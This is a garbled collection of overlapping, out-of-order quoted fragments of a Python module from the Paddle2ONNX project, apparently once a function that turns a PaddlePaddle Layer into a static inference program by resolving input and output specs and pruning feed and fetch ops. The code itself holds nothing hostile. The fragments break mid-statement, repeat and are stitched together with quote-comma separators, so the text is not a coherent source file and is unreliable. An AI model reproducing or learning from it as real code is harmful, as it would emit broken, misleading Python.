global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input(", "else: for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error %", "prune return input_var_names else: # fileter out non-tensor type spec infos. input_spec =", "ANY KIND, either express or implied. # See the License for the specific", "output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names", "but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var", "paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid", "polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name", "for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if", "no prune return input_var_names else: # fileter out non-tensor type spec infos. input_spec", "var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else:", "for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program,", "or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program =", "jit.save without input_spec, # avoid needless warning inner_input_spec = None else: continue input_var_names", "auc states to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars", "spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error %", "import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils", "var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: # no", "if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]:", "in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are", "append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \" \\", "\\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs):", "type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be", "from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from", "dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None)", "list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not", "\"If there are static functions other than 'forward' that need to be saved,", "(c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84):", "inner_layer = layer # avoid change user given input_spec inner_input_spec = None if", "for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type ==", "avoid needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) #", "output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx", "input_spec: if spec.name is None: # name is None, the input_spec only can", "will throw error # inner_input_spec is list[InputSpec], it should be packed with same", "tuple)): raise TypeError( \"The input input_spec should be 'list', but received input_spec's type", "jit.save, if input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec],", "specific language governing permissions and # limitations under the License. from __future__ import", "global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "input input_spec should be 'list', but received input_spec's type is %s.\" % type(input_spec))", "if input spec name not in input_var_names, only raise warning for spec in", "= _get_valid_program(main_program) # remind user to set auc_states to zeros if the program", "ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid", "None: # name is None, the input_spec only can be InputSpec raise ValueError(name_none_error", "main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in", "# avoid change user given input_spec inner_input_spec = None if input_spec is not", "# we only support VarBase spec, and actually, we only need the #", "= [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list =", "= [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec)", "OF ANY KIND, either express or implied. # See the License for the", "and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The", "Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\")", "(bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be", "from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops", "concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if", "input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the", "list[InputSpec], it should be packed with same structure # as original input_spec here.", "For output var, # we only support VarBase spec, and actually, we only", "not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc)", "# # Licensed under the Apache License, Version 2.0 (the \"License\" # you", "in declarative, which is equal to # @declarative with input_spec and jit.save without", "paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support", "extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer,", "\" \\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\"", "we only need the # var name of output, and we don't recommended", "import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs,", "var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index", "import declarative from paddle.fluid import core from paddle.fluid import layers from paddle.nn import", "the name of example Tensor \" \\ \"in configs.output_spec is the output tensor", "[var.name for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block =", "# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under", "model\" ) break with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars):", "index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True)", "example Tensor \" \\ \"in input_spec is the same as the name of", "for spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name", "for spec in input_spec: if spec.name is None: # name is None, the", "error # inner_input_spec is list[InputSpec], it should be packed with same structure #", "inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program", "the # var name of output, and we don't recommended to use output_spec", "paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error =", "name of InputSpec or example Tensor \" \\ \"in input_spec is the same", "result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable):", "elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type", "= main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops):", "paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names #", "elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for", "op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that you have set", "other than 'forward' that need to be saved, the input 'input_spec' should be", "needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang):", "= static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec", "= _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule", "of output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec)", "\\ \"in input_spec is the same as the name of InputSpec in \"", "not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: #", "All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the", "paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change user given", "\" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor `%s`", "import os import numpy as np import inspect import six import paddle from", "if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values()", "be None, but received the type of 'input_spec' is %s.\" % type(input_spec)) if", "\"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program", "elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise", "as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative(", "input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it should", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "warnings.warn( \"please ensure that you have set the auc states to zeros before", "Apache License, Version 2.0 (the \"License\" # you may not use this file", "inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info =", "ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user", "# Licensed under the Apache License, Version 2.0 (the \"License\" # you may", "TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "[v.name for v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var(", "Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for", "> 0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all(", "ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars]", "uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone() main_program =", "InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = []", "Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\"", "**configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't", "all_ops = main_program.global_block().ops for op in all_ops: # clear device of Op device_attr_name", "support VarBase spec, and actually, we only need the # var name of", "but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer =", "target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names)", "remind user to set auc_states to zeros if the program contains auc op", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "governing permissions and # limitations under the License. from __future__ import absolute_import import", "input_var_names = [ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if", "% var.name) else: for var in output_spec: if var.name not in output_vars_dict: raise", "input spec name not in input_var_names, only raise warning for spec in input_spec:", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for i, var", "% var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0)", "for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): #", "\" \\ \"Please make sure the name of InputSpec or example Tensor \"", "need the # var name of output, and we don't recommended to use", "if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer',", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "var if output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None", "# NOTE(chenweihang): [ Get output variables ] # the rule is like [", "var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program =", "InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure", "is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer =", "and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names =", "import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from", "not exists. \" \\ \"Please make sure the name of example Tensor \"", "required by applicable law or agreed to in writing, software # distributed under", "please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and", "i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var", "do nothing pass else: # prune for spec in input_spec: if spec.name is", "applicable law or agreed to in writing, software # distributed under the License", "is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in", "spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s`", "ValueError( \"If there are static functions other than 'forward' that need to be", "_get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \" \\ \"When using", "input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec):", "inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions: static_func =", "a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states", "the rule is like [ Get input variables name ]. For output var,", "are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please", "received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers", "] # the rule is like [ Get input variables name ]. For", "from __future__ import absolute_import import os import numpy as np import inspect import", "in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var", "else: # do nothing pass else: # prune for spec in input_spec: if", "input of paddle2onnx should be 'Layer', but received input type is %s.\" %", "is list[InputSpec], it should be packed with same structure # as original input_spec", "for op in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name,", "or agreed to in writing, software # distributed under the License is distributed", "# @declarative with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec", "actually, we only need the # var name of output, and we don't", "output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make", "clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc':", "recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars =", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else:", "isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in", "var, # we only support VarBase spec, and actually, we only need the", "spec name not in input_var_names, only raise warning for spec in input_spec: if", "in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if", "__future__ import absolute_import import os import numpy as np import inspect import six", "flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list =", "attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward'", "Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer', but received input", "received the type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list,", "_get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections", "writing, software # distributed under the License is distributed on an \"AS IS\"", "paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import layers from paddle.nn", "\\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\" result_list", "\"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars)", "name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program,", "that need to be saved, the input 'input_spec' should be None, but received", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list", "\"please ensure that you have set the auc states to zeros before saving", "= layer # avoid change user given input_spec inner_input_spec = None if input_spec", "prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \"", "License. # You may obtain a copy of the License at # #", "from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from", "functions other than 'forward' that need to be saved, the input 'input_spec' should", "2.0 (the \"License\" # you may not use this file except in compliance", "from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase,", "= [] input_var_names = [ var.name for var in flatten(inputs) if isinstance(var, Variable)", "ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The", "program contains auc op all_ops = main_program.global_block().ops for op in all_ops: # clear", "states to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars =", "output var, # we only support VarBase spec, and actually, we only need", "if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version()", "%s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec", "from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard", "inner_layer = layer._layers else: inner_layer = layer # avoid change user given input_spec", "OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core", "import absolute_import import os import numpy as np import inspect import six import", "compliance with the License. # You may obtain a copy of the License", "\\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error", "\\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names = [", "main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif", "feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for", "var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None:", "dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func:", "feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars", "'auc': warnings.warn( \"please ensure that you have set the auc states to zeros", "feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if", "i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\":", "isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change user", "\" \\ \"Please make sure the name of example Tensor \" \\ \"in", "if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change", "inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor", "= getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError(", "None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if", "% type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var)", "input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list", "as np import inspect import six import paddle from paddle.fluid.io import _get_valid_program from", "if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names'", "in input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error %", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in", "# the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else:", "\"The input input_spec should be 'list', but received input_spec's type is %s.\" %", "inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule is like", "var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in", "len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and", "input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return", "auc_states to zeros if the program contains auc op all_ops = main_program.global_block().ops for", "2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License,", "example Tensor \" \\ \"in configs.output_spec is the output tensor of \" \\", "the Layer.forward method.\" result_list = [] input_var_names = [ var.name for var in", "== len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name not in", "is incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it should be", "export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names)", "all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a list of", "\"and make sure they are consistent.\" name_no_exists_error = \"The tensor `%s` does not", "is None: # no prune return input_var_names else: # fileter out non-tensor type", "'forward' that need to be saved, the input 'input_spec' should be None, but", "None if input_spec is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer,", "op in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\")", "inspect import six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator,", "= None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output", "import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from", "not use this file except in compliance with the License. # You may", "output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return", "# fileter out non-tensor type spec infos. input_spec = [ spec for spec", "\"The %s's name is None. \" \\ \"When using jit.save, please set InputSepc's", "a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if", "not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be 'list', but", "absolute_import import os import numpy as np import inspect import six import paddle", "target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone()", "to # @declarative with input_spec and jit.save without input_spec, # avoid needless warning", "main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False)", "if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are static", "else: # fileter out non-tensor type spec infos. input_spec = [ spec for", "given input_spec inner_input_spec = None if input_spec is not None: for attr_func in", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer', but received", "and jit.save without input_spec, # avoid needless warning inner_input_spec = None else: continue", "var name of output, and we don't recommended to use output_spec output_vars =", "isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev):", "= pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the", "None. \" \\ \"When using jit.save, please set InputSepc's name in \" \\", "fetch_var_names = [v.name for v in target_vars] for target_v in target_vars: if not", "main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program)", "is equal to # @declarative with input_spec and jit.save without input_spec, # avoid", "main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for", "= input_var_names # if input spec name not in input_var_names, only raise warning", "\" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var in", "None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables", "from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten,", "elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass", "enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program", "targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v", "spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names):", "or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec):", "# you may not use this file except in compliance with the License.", "export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if not", "if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: #", "in input_spec: if spec.name is None: # name is None, the input_spec only", "output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True", "all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type", "target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = []", "agreed to in writing, software # distributed under the License is distributed on", "ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs):", "target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names", "from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph", "[] input_var_names = [ var.name for var in flatten(inputs) if isinstance(var, Variable) ]", "program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops,", "] if input_spec is None: # no prune return input_var_names else: # fileter", "prune for spec in input_spec: if spec.name is None: # name is None,", "paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict()", "been used in declarative, which is equal to # @declarative with input_spec and", "in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions:", "non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func", "in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names", "is None: # name is None, the input_spec only can be InputSpec raise", "get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError(", "ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input of", "the type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)):", 